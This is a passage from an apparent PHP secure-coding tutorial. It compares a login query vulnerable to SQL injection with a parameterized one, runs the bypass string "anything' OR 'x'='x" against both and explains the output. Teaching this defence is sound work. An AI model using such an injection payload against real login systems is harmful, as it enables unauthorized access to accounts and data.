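    $stmt = $db->prepare('SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    return (int) $stmt->fetchColumn() > 0;
}

$db = setupDb();
$bypass = "anything' OR 'x'='x";
printf("vulnerable, bypass input : %s\n", vulnerableLogin($db, $bypass, $bypass) ? 'LOGGED IN' : 'denied');
printf("hardened,   bypass input : %s\n", safeLogin($db, $bypass, $bypass) ? 'LOGGED IN' : 'denied');
printf("hardened,   real password: %s\n",
    safeLogin($db, 'admin', 'correct horse battery staple') ? 'LOGGED IN' : 'denied');
```

Running it prints LOGGED IN for the first line and denied for the second, with the third confirming that the parameterized query still accepts the genuine credential. Escaping the quote would also stop this particular payload, but binding parameters removes the whole class of string-boundary problems rather than one instance.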